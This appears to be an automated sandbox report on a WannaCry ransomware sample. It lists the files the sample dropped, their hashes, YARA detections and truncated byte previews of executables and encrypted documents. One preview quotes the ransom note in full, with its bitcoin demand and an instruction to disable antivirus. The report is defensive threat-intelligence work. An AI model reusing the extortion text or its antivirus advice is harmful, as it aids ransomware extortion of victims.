                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#O..g.v.g.v.g.v..2x.f.v..1|.l.v..1r.e.v.!+.d.v.g.w...v.Q.}.f.v.Richg.v.........PE..L.....[J.....................0......L........ ....@..........................P..............................................| ..<....@............................................................................... ..`............................text............................... ..`.rdata....... ....... ..............@..@.data........0.......0..............@....rsrc........@.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\Desktop\u.wnry

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\u.wnry, Author: Joe Security
                                • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\u.wnry, Author: ReversingLabs
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\Documents\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\Documents\@WanaDecryptor@.exe

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):245760
                                Entropy (8bit):6.278920408390635
                                Encrypted:false
                                SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                MD5:7BF2B57F2A205768755C07F238FB32CC
                                SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 96%
                                Reputation:unknown
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\Documents\BJZFPPWAPT.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.81044533136706
                                Encrypted:false
                                SSDEEP:24:k2tz1RMHRzEvgcCSUVP5tz1BujBke7ecSuv1H/V3Vfcp9aMiYI:k2tz1KHFEgWUVBt5BwB7UuptmpHI
                                MD5:C6D59EA6F66DF54A959A4E1109AA7AD2
                                SHA1:EAA7B5D45F760010447102697832E78847E48C8D
                                SHA-256:50F3E2C8514E0730D3D8286D225964F5A9F08B64AEE55A4E3317D91B0153EDF3
                                SHA-512:6C12864ED7687E2D1F9EC88DA94D5E05D7128AFFF416A0848C6E9BA096E7E3B4EA1A209121F61AA1A711CB015A4D5784794F8E0F49809AE2505D1394283D5A69
                                Malicious:false
                                Reputation:unknown
                                Preview:rH#.+....K..|...O.tw...|0..v.?.1p.~s.E.<....03....!.......w.s.zn.X.....wWsb0...o...35SZ}&.L.Ic"..?$.!...........[....*Ww.+.J...>.>A.l.....)(..QK. .j.i.S.s.....Pf}.b.....{.UM......D.....1!#;.^.#U.48.5.5..j...1.1....%M...Q."B..$5x..d>..&.../<z..<....L....1..X.R...5.`.S....>oY-...,f'.. .X.6Y.5g...*t=.1E...m...q.W'.C..o...u.....Bm>`I=....}*!..~W.._..D...<q.,.R&^....gU..Fg."Q`..n..AF.5..Lc|[j.C.2[1.>..eRD.U....Q..gp.6tH.&.G..#.]....U.'.Ot....{..R.K_..../Vjh....r.~./"<...UR..$...e.bw.....~).p.N..a7n.....%...,...,gr<s.....t....."..ZY.QD.U.s.=..|M...=.0..p..z&P..[....mQt..9...J#[.A._&..X.,i..u.e..c!uh...F......l>S.l...~......N..%.............U....!-.......nN..q..X.e...I....:..a.;......v5!.|......|.[..S..m......%....1;&..=v..E....P..q...fG.W.*.-.....oa.;.....h[..].,E$#J.+...XS.k....tf'&....B4.....3\v.k......ZH.?.q)...lo...3.T.1....`.G..%..>...MoY6V..7...hb.>k&....a:..C.s.E...R..K......:F.un.D..Al..HO.......;.j.........bI..j_P..<.-f..T.

                                C:\Users\user\Documents\BJZFPPWAPT.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854841549787096
                                Encrypted:false
                                SSDEEP:24:bkHKIs+9W3iAVXGO+Y8UhPUvxvOWEqQ4y3lEMvFQWrQ6x5FOdT6sKuEfp8nOknA:bkU+9WSAVXLp8SPqxvLQ4SlESRU6fsTE
                                MD5:9D4BA0CE039A7136989E2C13C1420711
                                SHA1:8DD2FF2295F0CD64E39B5B57F10BD29453AB368F
                                SHA-256:27370802315EC4CD60378F42E545AA1F652994801F2901A3AB4CB0184591418A
                                SHA-512:20446607ED09BA7AA0542F314C228976D35E5780B12E69F9E349AF5A5F0C8569EF7E514B0CB53A5974BE9FE5F117E46B3F4126ED295CF13B164066CB2BE5EA53
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......J.QS.r.....{..f.3s.X..Xf\R...s..W.>?.........x.m.Dlg*..... ......i.a.u.l...b..9...,R+w...%.e[.&....-.....J..H#..v.&..0.q.6$.P.~.C#n.....mbI..ts>P.....$8A._._...Z..#....x../...(.......J.. @ w...q{...?.....C.S.RyE..r..2V$0].}....qM..J.<M$#c.`.9.w.............(.f2...H.-$.D...BI.T.+..T5..@..l/...lmWu2+6......Uc##..@('k..i,..>.F.8uxs...6>.....e.._.1kj;.i6......ir.;L.c..T.bqO.......!U.K.....hv......]....Z.f.$...........@...a..Pb.W......pM!....g../.#..2G..G.p.am.Y?0..:N........>.K.....5g.8.#.hI~B............5.C...v-8=.D.~.'...)z..<K....:...)........Gok......~.X...&..,M..\6.......Qz......k.....{{#......g..u8gS...9..G...0.y.o..)pq.|.rc.#b.p....A...Xu-t.....y..*........6..>..c.....N/.=w.M..rI.E37....4..%....)...6A..M.~...:....j....Ap...>O\4...{..5..U..&../|B......Op...v.E...D....:.......u0..*.....~.vU=..*.g.....].UB..,%.sRyt.j..%..]).`@.....].....$..@..#~F...#......}.P#NT............r..w.7B.j*.%..<:....y....E.H.`s..H...'.L}|.)(9....b.

                                C:\Users\user\Documents\BJZFPPWAPT.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854841549787096
                                Encrypted:false
                                SSDEEP:24:bkHKIs+9W3iAVXGO+Y8UhPUvxvOWEqQ4y3lEMvFQWrQ6x5FOdT6sKuEfp8nOknA:bkU+9WSAVXLp8SPqxvLQ4SlESRU6fsTE
                                MD5:9D4BA0CE039A7136989E2C13C1420711
                                SHA1:8DD2FF2295F0CD64E39B5B57F10BD29453AB368F
                                SHA-256:27370802315EC4CD60378F42E545AA1F652994801F2901A3AB4CB0184591418A
                                SHA-512:20446607ED09BA7AA0542F314C228976D35E5780B12E69F9E349AF5A5F0C8569EF7E514B0CB53A5974BE9FE5F117E46B3F4126ED295CF13B164066CB2BE5EA53
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......J.QS.r.....{..f.3s.X..Xf\R...s..W.>?.........x.m.Dlg*..... ......i.a.u.l...b..9...,R+w...%.e[.&....-.....J..H#..v.&..0.q.6$.P.~.C#n.....mbI..ts>P.....$8A._._...Z..#....x../...(.......J.. @ w...q{...?.....C.S.RyE..r..2V$0].}....qM..J.<M$#c.`.9.w.............(.f2...H.-$.D...BI.T.+..T5..@..l/...lmWu2+6......Uc##..@('k..i,..>.F.8uxs...6>.....e.._.1kj;.i6......ir.;L.c..T.bqO.......!U.K.....hv......]....Z.f.$...........@...a..Pb.W......pM!....g../.#..2G..G.p.am.Y?0..:N........>.K.....5g.8.#.hI~B............5.C...v-8=.D.~.'...)z..<K....:...)........Gok......~.X...&..,M..\6.......Qz......k.....{{#......g..u8gS...9..G...0.y.o..)pq.|.rc.#b.p....A...Xu-t.....y..*........6..>..c.....N/.=w.M..rI.E37....4..%....)...6A..M.~...:....j....Ap...>O\4...{..5..U..&../|B......Op...v.E...D....:.......u0..*.....~.vU=..*.g.....].UB..,%.sRyt.j..%..]).`@.....].....$..@..#~F...#......}.P#NT............r..w.7B.j*.%..<:....y....E.H.`s..H...'.L}|.)(9....b.

                                C:\Users\user\Documents\BJZFPPWAPT.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.791705065444209
                                Encrypted:false
                                SSDEEP:24:m2Qs3BAXp3BN56fwMEPJ5IgfeyzEbpkbsizYjzYHFMD/t:BQjB6yPgVWtbsizYjzMK
                                MD5:026E47DF362D058D7F1699C9A42B2D4D
                                SHA1:3B9A8CC4DA2FC08BECFC340133603F6432DF1B2D
                                SHA-256:E0C6E25B1EAC4B65C79D311E5531DEC6FF7E61459C49731D1AFE739576B8EC98
                                SHA-512:17AB69ECF626A050DAE4AF0A190CB56C8A79AE8AE5FD784443879EB2652833CA691AF8B009BBEDB01A7840BF7C4ECF0D9270287CE3F7A8166BD51210C158721C
                                Malicious:false
                                Reputation:unknown
                                Preview:3..{..5&.^T...)vS............o...>... w..l..l.y..`....;....'.....ye.q(......U.Y....r....X~.u_.{.T.+CY.h.....%....=.-z+.I.:?....XhB.....X.@3.rp.g.I.L.l..~.rNf..8..|A.OI...M.........oD...h...S...2.A....B..U...........C...e.C..h....A..L..C.T\r...)?.s..+..V..........1A......s.p....|.3.6.....OT6.......1....".Bd|.)...?.9.....Q...um...zp..R..P.b.z.?....p.~.KQz...`~..O...|...v,d.3....<.._.".7...+...ra.^q@....]..F..[.F.+...8a$.}.........l.$.}$.f/VB.....U.V.y36...5....P..F.Bz..1.&..?..)9.i$Gg..K.L......~................QH.[..K.n..o.x.E%..6....(..@|.$0.:.....}...$...Tr......e.^.Ip.s.yaw..:.. 8(s...ON..=K.0..K.O.~.I..\w3F.z.uqU......].........J.`..8.a ..~.....[.UZ......Yf.;.X.A.f.&..nDQ...........m......b.i>...V.+.3. .t..._.A..bO.Me.PS.mV1>..'..?..}.ng.*.....-..,!..j.:...I.:gZQ...g>K.8t...v.x.-2.......t.&H..m.'.LR.^..%w...JI...0....N. ....m...M....jY.j8A.....=..QC."..'.gH8.>./....8.C{E.+a.5..#Z..@..N...T(..oywi'..0N..Q{0[O)..u* ....I.\.....05

                                C:\Users\user\Documents\BJZFPPWAPT.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827471222352906
                                Encrypted:false
                                SSDEEP:24:bkIU2uwfZ7d8cLKdVPifCx6yLjsiSiGbapTceMzZ33HUUkb:bkF2h9d87dVIzyjsBuglzZ330T
                                MD5:59C1EE5DD59669B48633C9E73B4A4747
                                SHA1:0101C26D66D2D9D27EFBA82628C592738A9089A6
                                SHA-256:ACBF71285056DD83B65090CB620EDA2C66C8A599F2B732BFE5FD02D76DDD858F
                                SHA-512:E61ECF922826FB7308D623E60B284D3B35753237801A639C780D44482C1BD1CE86A98AE79B35E5E71DF110A20E8C4BCD7AD02E35B419DE156F884F4072EB9491
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.... ZIQ...|RM..c.=..W..F%p...9kl..,...J.JD"x...QF..l.@P.....RB.&.k....7:C..`J..M..51v.$..eU3.?.....G...s.....Z...Ye...D.)..,.Z.|E...AY..~.6.........U/G....q..z2vu..V.Hn..o.s..Z.U...C..v..a]y5.xU7.u..v.*...VG..w-...;...#:.........._?./u....?B.5...hD.................Db.|F8..9e....;m.C..Y..b.+_N.( .?7.@W.7.x}dF..6o_.....`"k.R..=.#Aw...Y......O.iv....f.3..]..w...Rv..^.u.....@Z...y.Z..v>$...{......?..E...Q.y...J...l.l....#...._..p.....C.......<..xk..%........fQM.6b.....T..V.g.....:.U.].............n..>!j8...r.5*....?ZR.*...6*.% .j.....`...vu1.S.5..~..".Na...M....qMp..WkT.C...n8.d.!..|.....7.....4..<...L.FP#....|..=+G."2...o2#b....NZz...^tvL.;..[..1.w..U.kH.\.v.L$#......W.K....a..xR<...yz...."{.;P...Ul.#R...v.`... .|.......c......n..X....Z.6.k.YY.x.....rJ..E.d...\.B.V?<......i.....k.R...}.M{...K..9r.[Un.....#.RU...bi.....B._3.sm.\.y:F...C.#^...c~.H...hc~.U.e..q%;U0).........O..h.....|C..*..n!<.....G......W...o.6x"#4L.J.Tk....

                                C:\Users\user\Documents\BJZFPPWAPT.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827471222352906
                                Encrypted:false
                                SSDEEP:24:bkIU2uwfZ7d8cLKdVPifCx6yLjsiSiGbapTceMzZ33HUUkb:bkF2h9d87dVIzyjsBuglzZ330T
                                MD5:59C1EE5DD59669B48633C9E73B4A4747
                                SHA1:0101C26D66D2D9D27EFBA82628C592738A9089A6
                                SHA-256:ACBF71285056DD83B65090CB620EDA2C66C8A599F2B732BFE5FD02D76DDD858F
                                SHA-512:E61ECF922826FB7308D623E60B284D3B35753237801A639C780D44482C1BD1CE86A98AE79B35E5E71DF110A20E8C4BCD7AD02E35B419DE156F884F4072EB9491
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.... ZIQ...|RM..c.=..W..F%p...9kl..,...J.JD"x...QF..l.@P.....RB.&.k....7:C..`J..M..51v.$..eU3.?.....G...s.....Z...Ye...D.)..,.Z.|E...AY..~.6.........U/G....q..z2vu..V.Hn..o.s..Z.U...C..v..a]y5.xU7.u..v.*...VG..w-...;...#:.........._?./u....?B.5...hD.................Db.|F8..9e....;m.C..Y..b.+_N.( .?7.@W.7.x}dF..6o_.....`"k.R..=.#Aw...Y......O.iv....f.3..]..w...Rv..^.u.....@Z...y.Z..v>$...{......?..E...Q.y...J...l.l....#...._..p.....C.......<..xk..%........fQM.6b.....T..V.g.....:.U.].............n..>!j8...r.5*....?ZR.*...6*.% .j.....`...vu1.S.5..~..".Na...M....qMp..WkT.C...n8.d.!..|.....7.....4..<...L.FP#....|..=+G."2...o2#b....NZz...^tvL.;..[..1.w..U.kH.\.v.L$#......W.K....a..xR<...yz...."{.;P...Ul.#R...v.`... .|.......c......n..X....Z.6.k.YY.x.....rJ..E.d...\.B.V?<......i.....k.R...}.M{...K..9r.[Un.....#.RU...bi.....B._3.sm.\.y:F...C.#^...c~.H...hc~.U.e..q%;U0).........O..h.....|C..*..n!<.....G......W...o.6x"#4L.J.Tk....

                                C:\Users\user\Documents\BNAGMGSPLO.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.773353073231738
                                Encrypted:false
                                SSDEEP:24:Ze2JAWzz9RCj7S1Htdq57aNmqKm7EGVlJu/:Z5AW9QnS1Nc70K2NVvq
                                MD5:BA560958B10E5F1271D32CD2D24AC5A7
                                SHA1:292E4C1AB3DDC84EDE281FB2AB65778661615F1F
                                SHA-256:AF79515BC6AEE189FDD5817D1C9692045E836B19F1CF244E8603A348E5ABDF5E
                                SHA-512:CAD7BE9D1CF2C93A9F4A92420D3AE6F101819B54FC23F0FE081283502DED9FF503A21F9D7E950E1A8A2505917FDF7291D682D4F777E545E906FB2BC5CAD6E37E
                                Malicious:false
                                Reputation:unknown
                                Preview:.....[@av.....T.YqW.....o-X...........P,.:.5nl.1....c/.~...;C[.Z^8<1|&....yq...8p.....~..{/.A.b..fp*6|.S.....(z...&.[..'.0.....1.+&...-J..H....,...Gg.F..4Yq...#YTt.K.....3f...|9~BI.....5..l...D'....6...........${.w%.1...%.nz.$.J.....i.DP.<IK..Ih#....<...{.!.3....x...vn|W..9.n...........'...H..X........qI..Z"...6...g.8..~t5..m.#/..Ch...-...p.Ls.....f+zs?!......P.I./..?!...-..j!7.0p....y..Z3.US.H..>........y....e..R.[.....qx.Sg..[wo...W.4^.5.g.8.X...<........i...M.}G{Y.q.+@M.../......B....%..MI...h...l.*..{z....5s.$.M..(...v0U.@....i.r...rD.....}..>.......).e.b/.5#pU.-p.R+<...;.V..F.M.1.c.Hn.C5....f).x.p.i.....RYi..s...K..7.y.=.^......@@OR...........7i. ....q...Ix.ozq..Hg.1........`..f|.....l.(....".""O..l....2i{eT......\.T.....D.'3..A..ss...'.._..a..m...+)..0xv.8..],...|P.k.f_....`8..U...*..k.t$.|lK]..}...L\k #6sX.y...1....mF......nd..q9.A.}....*..l...`......y~..2.....,....1..k.>.....$...jY...|.?.k0{.6...F.Tl..%E|...F.-..H....

                                C:\Users\user\Documents\BNAGMGSPLO.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.871511155937053
                                Encrypted:false
                                SSDEEP:24:bkdPfjJo2acMYI3s55tpAYQh8NnDPCEEI/KvxEPx0/eMNJGFISxufPIOcL0Xr2sZ:bk/ukT5bY8N9/wGRMNUFIvf1/uU
                                MD5:7533F179AC1C67DADED1C0595E356032
                                SHA1:3BC181C9CC0EDCB141737AAC968BDA2FB3007324
                                SHA-256:DE341D9D12646546759AC08CF7FDE5B09B7D8E6536914866D889F8A9770E059B
                                SHA-512:533E3E1A267CF8AC78299EB2B89EDC63E156452DD937D71C458831252AA005E0DEEBB0C042CB23A6BE97BA742CD4AC5FBE22075B915847DF18E64552EF9B93A4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....Q.XlFJ.....qE.(.}=I..WV.j^^.~-.X.3.@..w....:6l%.....|....+...u...L...$..n..3...g.ydW....!a}R[z.+N.........;...8...h..*.6..Si.....]R..`.=.%.'.=....X .S.*~....>.>?M...z.....`j.W..f.....<...9._..X.U.c#.v...].!.y;.e@..%.<`...e....1 ".n..........................hY?..?..[@1..H.C;y...d..~...S...:L`.'..N.B.i.H...*|....H..J.S..R.3...o......ea.A...SC.....vw{..{..<.M.....sB.q.>.....f...>.x.........U.B. ..$....@.B..S.F....0..+....h...>..xR...E..L.g../.....X..j*.....*....,.9...]..C..QxCS~8F......K.T"...c.{.}..H[....g..tH\.o...Z<.I:.Ux.#..2Y.......`..#...2N.d.\-2../"...r..]...g.m..5.......1.h..D.......W.T..=..B.P...g8.;...x.3..&.D....k.|......y[..*A.:..0........M..&.)<...l8O..VQ .0^l.c.@*..(.Z.]%...,........k".PY.x......73....K.X..)x.pt^?;.Kq0.T...`A..n.......@.U$.dx.n9:R_/.c..BD.....c.Mi_...j.X,...D..........!7.#}._>.#.7R.K...T0..+.IV..5...};C...F.|.a...`Gs...w.b.4[i5c.3.{.f.#.>.c....P.0....X.;.Y6q=r.._9.)...j......&3.Z.h.d.

                                C:\Users\user\Documents\BNAGMGSPLO.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.871511155937053
                                Encrypted:false
                                SSDEEP:24:bkdPfjJo2acMYI3s55tpAYQh8NnDPCEEI/KvxEPx0/eMNJGFISxufPIOcL0Xr2sZ:bk/ukT5bY8N9/wGRMNUFIvf1/uU
                                MD5:7533F179AC1C67DADED1C0595E356032
                                SHA1:3BC181C9CC0EDCB141737AAC968BDA2FB3007324
                                SHA-256:DE341D9D12646546759AC08CF7FDE5B09B7D8E6536914866D889F8A9770E059B
                                SHA-512:533E3E1A267CF8AC78299EB2B89EDC63E156452DD937D71C458831252AA005E0DEEBB0C042CB23A6BE97BA742CD4AC5FBE22075B915847DF18E64552EF9B93A4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....Q.XlFJ.....qE.(.}=I..WV.j^^.~-.X.3.@..w....:6l%.....|....+...u...L...$..n..3...g.ydW....!a}R[z.+N.........;...8...h..*.6..Si.....]R..`.=.%.'.=....X .S.*~....>.>?M...z.....`j.W..f.....<...9._..X.U.c#.v...].!.y;.e@..%.<`...e....1 ".n..........................hY?..?..[@1..H.C;y...d..~...S...:L`.'..N.B.i.H...*|....H..J.S..R.3...o......ea.A...SC.....vw{..{..<.M.....sB.q.>.....f...>.x.........U.B. ..$....@.B..S.F....0..+....h...>..xR...E..L.g../.....X..j*.....*....,.9...]..C..QxCS~8F......K.T"...c.{.}..H[....g..tH\.o...Z<.I:.Ux.#..2Y.......`..#...2N.d.\-2../"...r..]...g.m..5.......1.h..D.......W.T..=..B.P...g8.;...x.3..&.D....k.|......y[..*A.:..0........M..&.)<...l8O..VQ .0^l.c.@*..(.Z.]%...,........k".PY.x......73....K.X..)x.pt^?;.Kq0.T...`A..n.......@.U$.dx.n9:R_/.c..BD.....c.Mi_...j.X,...D..........!7.#}._>.#.7R.K...T0..+.IV..5...};C...F.|.a...`Gs...w.b.4[i5c.3.{.f.#.>.c....P.0....X.;.Y6q=r.._9.)...j......&3.Z.h.d.

                                C:\Users\user\Documents\BNAGMGSPLO.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8053895262141735
                                Encrypted:false
                                SSDEEP:24:/oGygW4vXQ2dfaiZbLfhWLRTvkZ8rPhktACx3Q:FrhNZbLpWNTvk+h5
                                MD5:3B13ED3F0883F7055D33AAE104565A27
                                SHA1:652B535F7E9FB1B90836EE4DFF1B84A689BEB52D
                                SHA-256:FCEA2195826CCE612D914A97075AE2260EE1E1BBA70F4BDBAE48174E2676687F
                                SHA-512:5D06B1D327DFFC8B8B2E600428BA516F2F388B8B59833A97F1F653903982017183AF65C5E6EA7ED15001BB37D7A7B061F3EA35615B82055132617C2AEF638E44
                                Malicious:false
                                Reputation:unknown
                                Preview:So/Dc.Y......^..I.].,..$.....P8..F..N.....~e...l1.D.h..\.]>8.3.'.....t.>.~.1A.,. !.....v1...q.T..N.6.S.y?j..MOFD..O.fh3x.....G_........I#/R.AEr..IJ.......2n.bm.D{..pY./OE.'.......[..R_x..iz2!..].W1...H...b..O..-.5.....2d.\..3..3?..}.\M....?6..&..Q.._W.O.....i..1u...D.....x...=.g...........?.(.fN.qR,.......R. ..Z2..........#..t!=..T6N.....#..w..O...m..]. Ecl.S......F2y..:..j=..Bc.w.9.......XW+d.sB....#S.p.A.`..xX.%.|....P...$[ ..............G...h.....-..D@...G...0..X.....*?}..m.&...GTx...K?oz.T..H..\....j?c..C...WIsN|E.-Z........q.pA..8..B>'v,..5E....h.Pu...../.Z........W....l!.....#.k....u..VI..J`... ..99..?..'.5...wRo.rm.Ys!h.........b.nB..,.....>X].....}..<.....X..?.. Z.p..C..d..O.v..W..3...d..}......[....@.M.k..=Z..U&.'hV.b...R.l...-.[a.u. ....g..a..`u...+..(]..q.>z.A7..+3.n.eU......z...`:ph.D.....g....{.'n....'.E...X8.<.........".k..W..l.....O..5..W...Zi.a'.._.A...t.5d..G\|/..U.......v....BU...3o..s.....{b.5.+.....}$....l...m.6.

                                C:\Users\user\Documents\BNAGMGSPLO.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.848398801601788
                                Encrypted:false
                                SSDEEP:24:bkBlvkHXlAra+QWNWaGBYdorhPn5CDcevgrbf0ASHBINIAWj9:bkoArrQ6WaqY2Pn4DcWAgbf9
                                MD5:696D39D76CCEF1F3E7DA9CA80A083C4C
                                SHA1:19081610EBFE348960308B32978B54BB5EA8BC77
                                SHA-256:3EDD80FC375833B678FFD0D29B802A2D8373F454BE0E3A085A84429F050C6C6D
                                SHA-512:9C74E7C04EC4FA3394845D2638A55F37B86BD5FC522D795EA29A8008AA45F6378016C97DF90AF83D28BC4731D77F1E0660BC6A2A3A82E9E2A8968C5B5B0A8EE7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......T..Z.ee.6...%n....(.^U.f9&.(95....U..^....x.^..}....tm.......r.J-.\..q.?.#'.J...h...{z.$s.......c...j.P.......Z.,..>jf....F....S&N...f"..Y{F.E..mE...x....)}..U.x....{.j%L.j.~.5-..= ?2rK.#...+..@..e^U.-.....4I.4.p...D[.>s.....m...&........].~.............FG~.?b&Sb.5..zF.x.2...%T,N..N...q.j...*Yf....4......Y....+..]$.pJ.x...h. ..P+wZv.1..^.....!...Do.._.&..^.y.....c..@i.............!..PL..J..wp...rr.f/.<%..........jz3.y........*..a.T...?....v.m..=.?.f...m......H.Z..){.-.%8...v'.*..aL..E.LD\H...eSr.S2 Nq@..c`.....<J.....~B.,....VU[Y;.9.."Z=R.a.H....t..v....~..M..'IX.V.?, h..X........]....x..4B...0...".m!..:.......@...P..3n.....Q.....Z.....#.G4..GF..g.Y.;.}M.vV.n.>.}..... .e....G04(..m..5.sz.t5.4XO...._&f....nu.r~c.FZ........&C..y.H..........p..+..I..:?..sF.m....!TL]._.7?m.6=.snz.1.V.o.@Cc.2.B9.pP.....>......3....00...#}.vt.*..N....l$F<..8...KRz.n...dN3...5mL....A>.e..|Vd.Q\.[...2..j..R.I.....F.%@....!..G..17...%DX.z.a:]r.. %.X.6

                                C:\Users\user\Documents\BNAGMGSPLO.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.848398801601788
                                Encrypted:false
                                SSDEEP:24:bkBlvkHXlAra+QWNWaGBYdorhPn5CDcevgrbf0ASHBINIAWj9:bkoArrQ6WaqY2Pn4DcWAgbf9
                                MD5:696D39D76CCEF1F3E7DA9CA80A083C4C
                                SHA1:19081610EBFE348960308B32978B54BB5EA8BC77
                                SHA-256:3EDD80FC375833B678FFD0D29B802A2D8373F454BE0E3A085A84429F050C6C6D
                                SHA-512:9C74E7C04EC4FA3394845D2638A55F37B86BD5FC522D795EA29A8008AA45F6378016C97DF90AF83D28BC4731D77F1E0660BC6A2A3A82E9E2A8968C5B5B0A8EE7
                                Malicious:false
                                Reputation:unknown
